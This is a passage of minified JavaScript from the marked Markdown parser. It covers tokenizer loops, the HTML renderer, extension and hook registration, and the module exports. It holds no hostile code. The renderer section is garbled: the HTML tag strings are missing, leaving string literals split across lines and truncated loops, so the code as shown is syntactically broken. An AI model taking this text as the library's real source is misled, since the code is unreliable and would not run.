s;this.options.extensions.startBlock.forEach((e=>{s=e.call({lexer:this},n),"number"==typeof s&&s>=0&&(t=Math.min(t,s))})),t<1/0&&t>=0&&(i=e.substring(0,t+1))}if(this.state.top&&(s=this.tokenizer.paragraph(i)))r=t[t.length-1],n&&"paragraph"===r?.type?(r.raw+="\n"+s.raw,r.text+="\n"+s.text,this.inlineQueue.pop(),this.inlineQueue[this.inlineQueue.length-1].src=r.text):t.push(s),n=i.length!==e.length,e=e.substring(s.raw.length);else if(s=this.tokenizer.text(e))e=e.substring(s.raw.length),r=t[t.length-1],r&&"text"===r.type?(r.raw+="\n"+s.raw,r.text+="\n"+s.text,this.inlineQueue.pop(),this.inlineQueue[this.inlineQueue.length-1].src=r.text):t.push(s);else if(e){const t="Infinite loop on byte: "+e.charCodeAt(0);if(this.options.silent){console.error(t);break}throw new Error(t)}}return this.state.top=!0,t}inline(e,t=[]){return this.inlineQueue.push({src:e,tokens:t}),t}inlineTokens(e,t=[]){let n,s,r,i,l,o,a=e;if(this.tokens.links){const e=Object.keys(this.tokens.links);if(e.length>0)for(;null!=(i=this.tokenizer.rules.inline.reflinkSearch.exec(a));)e.includes(i[0].slice(i[0].lastIndexOf("[")+1,-1))&&(a=a.slice(0,i.index)+"["+"a".repeat(i[0].length-2)+"]"+a.slice(this.tokenizer.rules.inline.reflinkSearch.lastIndex))}for(;null!=(i=this.tokenizer.rules.inline.blockSkip.exec(a));)a=a.slice(0,i.index)+"["+"a".repeat(i[0].length-2)+"]"+a.slice(this.tokenizer.rules.inline.blockSkip.lastIndex);for(;null!=(i=this.tokenizer.rules.inline.anyPunctuation.exec(a));)a=a.slice(0,i.index)+"++"+a.slice(this.tokenizer.rules.inline.anyPunctuation.lastIndex);for(;e;)if(l||(o=""),l=!1,!(this.options.extensions&&this.options.extensions.inline&&this.options.extensions.inline.some((s=>!!(n=s.call({lexer:this},e,t))&&(e=e.substring(n.raw.length),t.push(n),!0)))))if(n=this.tokenizer.escape(e))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.tag(e))e=e.substring(n.raw.length),s=t[t.length-1],s&&"text"===n.type&&"text"===s.type?(s.raw+=n.raw,s.text+=n.text):t.push(n);else if(n=this.tokenizer.link(e))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.reflink(e,this.tokens.links))e=e.substring(n.raw.length),s=t[t.length-1],s&&"text"===n.type&&"text"===s.type?(s.raw+=n.raw,s.text+=n.text):t.push(n);else if(n=this.tokenizer.emStrong(e,a,o))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.codespan(e))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.br(e))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.del(e))e=e.substring(n.raw.length),t.push(n);else if(n=this.tokenizer.autolink(e))e=e.substring(n.raw.length),t.push(n);else if(this.state.inLink||!(n=this.tokenizer.url(e))){if(r=e,this.options.extensions&&this.options.extensions.startInline){let t=1/0;const n=e.slice(1);let s;this.options.extensions.startInline.forEach((e=>{s=e.call({lexer:this},n),"number"==typeof s&&s>=0&&(t=Math.min(t,s))})),t<1/0&&t>=0&&(r=e.substring(0,t+1))}if(n=this.tokenizer.inlineText(r))e=e.substring(n.raw.length),"_"!==n.raw.slice(-1)&&(o=n.raw.slice(-1)),l=!0,s=t[t.length-1],s&&"text"===s.type?(s.raw+=n.raw,s.text+=n.text):t.push(n);else if(e){const t="Infinite loop on byte: "+e.charCodeAt(0);if(this.options.silent){console.error(t);break}throw new Error(t)}}else e=e.substring(n.raw.length),t.push(n);return t}}class ne{options;parser;constructor(t){this.options=t||e.defaults}space(e){return""}code({text:e,lang:t,escaped:n}){const s=(t||"").match(/^\S*/)?.[0],r=e.replace(/\n$/,"")+"\n";return s?'
'+(n?r:c(r,!0))+"
\n":"
"+(n?r:c(r,!0))+"
\n"}blockquote({tokens:e}){return`
\n${this.parser.parse(e)}
\n`}html({text:e}){return e}heading({tokens:e,depth:t}){return`${this.parser.parseInline(e)}\n`}hr(e){return"
\n"}list(e){const t=e.ordered,n=e.start;let s="";for(let t=0;t\n"+s+"\n"}listitem(e){let t="";if(e.task){const n=this.checkbox({checked:!!e.checked});e.loose?e.tokens.length>0&&"paragraph"===e.tokens[0].type?(e.tokens[0].text=n+" "+e.tokens[0].text,e.tokens[0].tokens&&e.tokens[0].tokens.length>0&&"text"===e.tokens[0].tokens[0].type&&(e.tokens[0].tokens[0].text=n+" "+e.tokens[0].tokens[0].text)):e.tokens.unshift({type:"text",raw:n+" ",text:n+" "}):t+=n+" "}return t+=this.parser.parse(e.tokens,!!e.loose),`
  • ${t}
  • \n`}checkbox({checked:e}){return"'}paragraph({tokens:e}){return`

    ${this.parser.parseInline(e)}

    \n`}table(e){let t="",n="";for(let t=0;t${s}`),"\n\n"+t+"\n"+s+"
    \n"}tablerow({text:e}){return`\n${e}\n`}tablecell(e){const t=this.parser.parseInline(e.tokens),n=e.header?"th":"td";return(e.align?`<${n} align="${e.align}">`:`<${n}>`)+t+`\n`}strong({tokens:e}){return`${this.parser.parseInline(e)}`}em({tokens:e}){return`${this.parser.parseInline(e)}`}codespan({text:e}){return`${e}`}br(e){return"
    "}del({tokens:e}){return`${this.parser.parseInline(e)}`}link({href:e,title:t,tokens:n}){const s=this.parser.parseInline(n),r=k(e);if(null===r)return s;let i='
    ",i}image({href:e,title:t,text:n}){const s=k(e);if(null===s)return n;let r=`${n}{const r=e[s].flat(1/0);n=n.concat(this.walkTokens(r,t))})):e.tokens&&(n=n.concat(this.walkTokens(e.tokens,t)))}}return n}use(...e){const t=this.defaults.extensions||{renderers:{},childTokens:{}};return e.forEach((e=>{const n={...e};if(n.async=this.defaults.async||n.async||!1,e.extensions&&(e.extensions.forEach((e=>{if(!e.name)throw new Error("extension name required");if("renderer"in e){const n=t.renderers[e.name];t.renderers[e.name]=n?function(...t){let s=e.renderer.apply(this,t);return!1===s&&(s=n.apply(this,t)),s}:e.renderer}if("tokenizer"in e){if(!e.level||"block"!==e.level&&"inline"!==e.level)throw new Error("extension level must be 'block' or 'inline'");const n=t[e.level];n?n.unshift(e.tokenizer):t[e.level]=[e.tokenizer],e.start&&("block"===e.level?t.startBlock?t.startBlock.push(e.start):t.startBlock=[e.start]:"inline"===e.level&&(t.startInline?t.startInline.push(e.start):t.startInline=[e.start]))}"childTokens"in e&&e.childTokens&&(t.childTokens[e.name]=e.childTokens)})),n.extensions=t),e.renderer){const t=this.defaults.renderer||new ne(this.defaults);for(const n in e.renderer){if(!(n in t))throw new Error(`renderer '${n}' does not exist`);if(["options","parser"].includes(n))continue;const s=n;let r=e.renderer[s];const i=t[s];t[s]=(...n)=>{e.useNewRenderer||(r=this.#t(r,s,t));let l=r.apply(t,n);return!1===l&&(l=i.apply(t,n)),l||""}}n.renderer=t}if(e.tokenizer){const t=this.defaults.tokenizer||new b(this.defaults);for(const n in e.tokenizer){if(!(n in t))throw new Error(`tokenizer '${n}' does not exist`);if(["options","rules","lexer"].includes(n))continue;const s=n,r=e.tokenizer[s],i=t[s];t[s]=(...e)=>{let n=r.apply(t,e);return!1===n&&(n=i.apply(t,e)),n}}n.tokenizer=t}if(e.hooks){const t=this.defaults.hooks||new ie;for(const n in e.hooks){if(!(n in t))throw new Error(`hook '${n}' does not exist`);if("options"===n)continue;const s=n,r=e.hooks[s],i=t[s];ie.passThroughHooks.has(n)?t[s]=e=>{if(this.defaults.async)return Promise.resolve(r.call(t,e)).then((e=>i.call(t,e)));const n=r.call(t,e);return i.call(t,n)}:t[s]=(...e)=>{let n=r.apply(t,e);return!1===n&&(n=i.apply(t,e)),n}}n.hooks=t}if(e.walkTokens){const t=this.defaults.walkTokens,s=e.walkTokens;n.walkTokens=function(e){let n=[];return n.push(s.call(this,e)),t&&(n=n.concat(t.call(this,e))),n}}this.defaults={...this.defaults,...n}})),this}#t(e,t,n){switch(t){case"heading":return function(s){return s.type&&s.type===t?e.call(this,n.parser.parseInline(s.tokens),s.depth,function(e){return e.replace(h,((e,t)=>"colon"===(t=t.toLowerCase())?":":"#"===t.charAt(0)?"x"===t.charAt(1)?String.fromCharCode(parseInt(t.substring(2),16)):String.fromCharCode(+t.substring(1)):""))}(n.parser.parseInline(s.tokens,n.parser.textRenderer))):e.apply(this,arguments)};case"code":return function(n){return n.type&&n.type===t?e.call(this,n.text,n.lang,!!n.escaped):e.apply(this,arguments)};case"table":return function(n){if(!n.type||n.type!==t)return e.apply(this,arguments);let s="",r="";for(let e=0;e0&&"paragraph"===t.tokens[0].type?(t.tokens[0].text=e+" "+t.tokens[0].text,t.tokens[0].tokens&&t.tokens[0].tokens.length>0&&"text"===t.tokens[0].tokens[0].type&&(t.tokens[0].tokens[0].text=e+" "+t.tokens[0].tokens[0].text)):t.tokens.unshift({type:"text",text:e+" "}):o+=e+" "}o+=this.parser.parse(t.tokens,i),l+=this.listitem({type:"list_item",raw:o,text:o,task:r,checked:!!s,loose:i,tokens:t.tokens})}return e.call(this,l,s,r)};case"html":return function(n){return n.type&&n.type===t?e.call(this,n.text,n.block):e.apply(this,arguments)};case"paragraph":case"strong":case"em":case"del":return function(n){return n.type&&n.type===t?e.call(this,this.parser.parseInline(n.tokens)):e.apply(this,arguments)};case"escape":case"codespan":case"text":return function(n){return n.type&&n.type===t?e.call(this,n.text):e.apply(this,arguments)};case"link":return function(n){return n.type&&n.type===t?e.call(this,n.href,n.title,this.parser.parseInline(n.tokens)):e.apply(this,arguments)};case"image":return function(n){return n.type&&n.type===t?e.call(this,n.href,n.title,n.text):e.apply(this,arguments)}}return e}setOptions(e){return this.defaults={...this.defaults,...e},this}lexer(e,t){return te.lex(e,t??this.defaults)}parser(e,t){return re.parse(e,t??this.defaults)}#e(e,t){return(n,s)=>{const r={...s},i={...this.defaults,...r};!0===this.defaults.async&&!1===r.async&&(i.silent||console.warn("marked(): The async option was set to true by an extension. The async: false option sent to parse will be ignored."),i.async=!0);const l=this.#n(!!i.silent,!!i.async);if(null==n)return l(new Error("marked(): input parameter is undefined or null"));if("string"!=typeof n)return l(new Error("marked(): input parameter is of type "+Object.prototype.toString.call(n)+", string expected"));if(i.hooks&&(i.hooks.options=i),i.async)return Promise.resolve(i.hooks?i.hooks.preprocess(n):n).then((t=>e(t,i))).then((e=>i.hooks?i.hooks.processAllTokens(e):e)).then((e=>i.walkTokens?Promise.all(this.walkTokens(e,i.walkTokens)).then((()=>e)):e)).then((e=>t(e,i))).then((e=>i.hooks?i.hooks.postprocess(e):e)).catch(l);try{i.hooks&&(n=i.hooks.preprocess(n));let s=e(n,i);i.hooks&&(s=i.hooks.processAllTokens(s)),i.walkTokens&&this.walkTokens(s,i.walkTokens);let r=t(s,i);return i.hooks&&(r=i.hooks.postprocess(r)),r}catch(e){return l(e)}}}#n(e,t){return n=>{if(n.message+="\nPlease report this to https://github.com/markedjs/marked.",e){const e="

    An error occurred:

    "+c(n.message+"",!0)+"
    ";return t?Promise.resolve(e):e}if(t)return Promise.reject(n);throw n}}}const oe=new le;function ae(e,t){return oe.parse(e,t)}ae.options=ae.setOptions=function(e){return oe.setOptions(e),ae.defaults=oe.defaults,n(ae.defaults),ae},ae.getDefaults=t,ae.defaults=e.defaults,ae.use=function(...e){return oe.use(...e),ae.defaults=oe.defaults,n(ae.defaults),ae},ae.walkTokens=function(e,t){return oe.walkTokens(e,t)},ae.parseInline=oe.parseInline,ae.Parser=re,ae.parser=re.parse,ae.Renderer=ne,ae.TextRenderer=se,ae.Lexer=te,ae.lexer=te.lex,ae.Tokenizer=b,ae.Hooks=ie,ae.parse=ae;const ce=ae.options,he=ae.setOptions,pe=ae.use,ue=ae.walkTokens,ke=ae.parseInline,ge=ae,fe=re.parse,de=te.lex;e.Hooks=ie,e.Lexer=te,e.Marked=le,e.Parser=re,e.Renderer=ne,e.TextRenderer=se,e.Tokenizer=b,e.getDefaults=t,e.lexer=de,e.marked=ae,e.options=ce,e.parse=ge,e.parseInline=ke,e.parser=fe,e.setOptions=he,e.use=pe,e.walkTokens=ue}));